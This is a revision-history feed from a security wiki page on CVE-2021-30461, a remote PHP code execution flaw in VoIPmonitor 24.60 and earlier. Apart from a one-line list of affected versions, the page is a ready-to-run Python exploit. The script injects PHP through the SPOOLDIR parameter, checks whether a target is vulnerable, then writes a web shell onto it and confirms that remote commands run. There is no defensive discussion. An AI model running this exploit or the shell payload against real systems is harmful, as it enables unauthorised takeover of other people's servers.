https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-30461_VoIPmonitor_%E9%81%A0%E7%A8%8BPHP%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2021-30461 VoIPmonitor 遠程PHP代碼執行漏洞 - Revision history
2026-04-10T08:17:52Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-30461_VoIPmonitor_%E9%81%A0%E7%A8%8BPHP%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=2683&oldid=prev
Pwnwiki: Created page with "==影響版本== VoIPmonitor 24.60及更低版本 ==EXP== <pre> import argparse from sys import argv,exit import time import random import string try: import requests e..."
2021-05-06T11:48:34Z
<p>Created page with "==影響版本== VoIPmonitor 24.60及更低版本 ==EXP== <pre> import argparse from sys import argv,exit import time import random import string try: import requests e..."</p>
<p><b>New page</b></p><div>==影響版本==<br />
VoIPmonitor 24.60及更低版本<br />
<br />
<br />
==EXP==<br />
<pre><br />
import argparse<br />
from sys import argv,exit<br />
import time<br />
import random<br />
import string<br />
<br />
try:<br />
import requests<br />
except ImportError:<br />
print("pip3 install requests ")<br />
<br />
print("""<br />
###############################################<br />
# VOIP Monitor RCE #<br />
###############################################<br />
""")<br />
<br />
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"}<br />
<br />
<br />
def get_target(args):<br />
hostname = args.host<br />
path = args.path<br />
if path:<br />
return f"http://{hostname}/{path}/index.php"<br />
else:<br />
return f"http://{hostname}/index.php"<br />
<br />
def set_tmp(args):<br />
global headers<br />
target = get_target(args)<br />
n_data = {"SPOOLDIR": "/tmp", "recheck": "annen"}<br />
set_totmp = requests.post(target, n_data, headers=headers)<br />
print(f"[*] set /tmp {set_totmp}")<br />
<br />
<br />
def checkVulnerability(args):<br />
global headers<br />
target = get_target(args)<br />
print(f"[+] Attacking {target}")<br />
testcmd = {"SPOOLDIR": "test\".system(id).\"", "recheck": "annen"}<br />
response_text = b"uid="<br />
testcmd_req = requests.post(target, testcmd, verify=False, headers=headers)<br />
if response_text in testcmd_req.content:<br />
print("[*] host is vulnerable")<br />
else:<br />
print("[-] host is not vulnerable")<br />
exit()<br />
<br />
<br />
def uploadshell(args):<br />
global headers<br />
hostname = args.host<br />
path = args.path<br />
shell_path = ""<br />
shellfilename = str ( ''.join(random.choice(string.ascii_lowercase) for i in range(10)) )<br />
target = get_target(args)<br />
rce_payload = {"SPOOLDIR": f"/tmp\".file_put_contents('{shellfilename}.php','<?php echo system($_GET[\"a\"]);').\"", "recheck": "annen"}<br />
rce_req = requests.post(target, headers=headers, data=rce_payload)<br />
print(f"[*] uploading shell {rce_req.status_code}")<br />
if path:<br />
shell_path = f"http://{hostname}/{path}/{shellfilename}.php"<br />
else:<br />
shell_path = f"http://{hostname}/{shellfilename}.php"<br />
shell_check = requests.get(shell_path, headers=headers, params={'a':'id'})<br />
print(f"[*] RCE Check : {shell_check.text}")<br />
print(f"[*] Your Shell at {shell_path}")<br />
<br />
<br />
def main():<br />
parser = argparse.ArgumentParser(description='VoIP Monitor all versions command execution')<br />
parser.add_argument('-t','--host',help='Host', type=str)<br />
parser.add_argument('-b', '--path',help='Path of the VoIP Monitor', type=str)<br />
args = parser.parse_args()<br />
set_tmp(args)<br />
checkVulnerability(args)<br />
set_tmp(args)<br />
uploadshell(args)<br />
set_tmp(args)<br />
<br />
<br />
<br />
if __name__ == "__main__":<br />
main()<br />
</pre></div>
Pwnwiki